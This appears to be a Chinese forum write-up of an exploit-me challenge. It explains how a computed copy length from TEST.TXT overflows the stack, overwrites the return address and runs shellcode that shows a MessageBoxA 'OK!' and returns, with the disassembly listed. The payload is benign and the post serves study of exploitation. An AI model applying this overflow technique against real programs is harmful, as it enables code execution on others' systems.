文件见附件
过程如下, 查找字符串发现读取TEST.TXT,分配空间后读取到动态空间
先分析发现文件的头2个DOWRD为一个64位整型,设为X 满足一定条件
unsigned __int64 num1=0x78CC02A869948F1B;
unsigned __int64 num2=0x5BE6FF82A5164785;

程序从动态空间复制 (X*num2)%num1 位到堆栈,因此可以覆盖返回地址.
覆盖后返回到堆栈地址  0012FAC0处,构造如下SHELLCODE
003F000C    8D4E 11         lea     ecx, dword ptr [esi+11] //ESI指向动态空间
003F000F    FFE1            jmp     ecx //跳转到动态空间执行
003F0011    8D4E 08         lea     ecx, dword ptr [esi+8] //+8处为字符串OK！
003F0014    57              push    edi //EDI=0
003F0015    51              push    ecx
003F0016    51              push    ecx
003F0017    57              push    edi
003F0018    FF15 4C024000   call    dword ptr [<&USER32.MessageBoxA>>; USER32.MessageBoxA
003F001E    59              pop     ecx //平衡堆栈
003F001F    59              pop     ecx
003F0020  - E9 7A030100     jmp     ExploitM.0040039F //返回用户空间

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

• test.rar （23.58kb，5次下载）